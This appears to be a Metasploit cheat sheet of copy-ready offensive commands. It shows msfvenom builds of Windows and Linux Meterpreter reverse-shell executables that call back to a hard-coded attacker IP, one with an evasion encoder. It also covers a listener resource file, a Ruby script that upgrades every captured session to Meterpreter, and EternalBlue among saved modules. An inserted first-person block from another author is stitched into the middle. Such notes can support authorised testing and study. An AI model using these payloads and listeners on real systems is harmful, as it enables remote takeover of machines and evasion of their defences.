Metasploit

Msfvenom

List payloads : msfvenom --list payloads

# Windows (EXE)
$ msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.9.52.138 LPORT=9001 -f exe -o shell.exe

# Windows (x86 EXE with encoder)
$ msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.9.52.138 LPORT=9001 -f exe -o shell.exe

# Linux (ELF)
$ msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=10.9.52.138 LPORT=9001 -f elf -o shell.bin
  • staged : two parts; a small stager connects back to the listener, which then sends the rest of the payload (the stage) to it (module names with a slash, e.g. windows/meterpreter/reverse_tcp).
  • stageless : the whole reverse shell is directly inside the payload (module names with an underscore, e.g. windows/x64/meterpreter_reverse_tcp).

Resource file

File listener.rc :

use exploit/multi/handler
set LHOST tun0
set LPORT 9001
set payload windows/x64/meterpreter_reverse_tcp
exploit -j

Command : msfconsole -r listener.rc


Using Ruby inside a resource file.

msf6 > resource shell2meterpreter.rc
[*] Processing /tmp/shell2meterpreter.rc for ERB directives.
[*] resource (/tmp/shell2meterpreter.rc)> Ruby Code (165 bytes)

File shell2meterpreter.rc :

<ruby>
framework.sessions.each_pair do |sid, session|
  run_single("use post/multi/manage/shell_to_meterpreter")
  run_single("set SESSION #{sid}")
  run_single("run")
end
</ruby>
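As an added example (not from the original page), the same pattern extended so that only plain shell sessions are upgraded and sessions that are already Meterpreter are skipped, with the listener settings passed explicitly. `framework.sessions`, `session.type`, `run_single` and `print_status` are Metasploit's own resource-script API; `shell_session_ids` and the `lhost`/`lport` values are assumptions of mine. In the .rc file the body goes between `<ruby>` and `</ruby>` tags as above; the tags are omitted here so the Ruby runs stand-alone.

```ruby
# Return the ids of sessions whose type is "shell", sorted ascending, so that
# Meterpreter (or otherwise already-upgraded) sessions are left untouched.
# `sessions` is a Hash of sid => session object responding to #type, which is
# what framework.sessions provides inside msfconsole.
def shell_session_ids(sessions)
  sessions.select { |_sid, s| s.type == 'shell' }.keys.sort
end

# Listener settings for the upgraded Meterpreter sessions (constructed values).
lhost = 'tun0'
lport = 4445

# `framework` and `run_single` only exist when this file is loaded with
# `msfconsole -r file.rc` or the `resource` command; the guard keeps the
# helper loadable (and testable) outside msfconsole.
if defined?(framework)
  ids = shell_session_ids(framework.sessions)
  print_status("Upgrading #{ids.size} shell session(s): #{ids.join(', ')}")
  ids.each do |sid|
    run_single('use post/multi/manage/shell_to_meterpreter')
    run_single("set SESSION #{sid}")
    run_single("set LHOST #{lhost}")
    run_single("set LPORT #{lport}")
    run_single('run')
  end
end
```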

Favorites

Add module to favorites :

msf6 exploit(multi/handler) > favorite
[+] Added exploit/multi/handler to the favorite modules file

Show favorites :

msf6 > show favorites

Favorites
=========

   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  exploit/multi/handler                                      manual   No     Generic Payload Handler
   1  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption

Delete a favorite :

msf6 > favorite -d exploit/multi/handler
[*] Removing exploit/multi/handler from the favorite modules file

Modules

shell_to_meterpreter

msf6 > use post/multi/manage/shell_to_meterpreter
msf6 post(multi/manage/shell_to_meterpreter) > set session 1
session => 1
msf6 post(multi/manage/shell_to_meterpreter) > set LPORT 4445
LPORT => 4445
msf6 post(multi/manage/shell_to_meterpreter) > run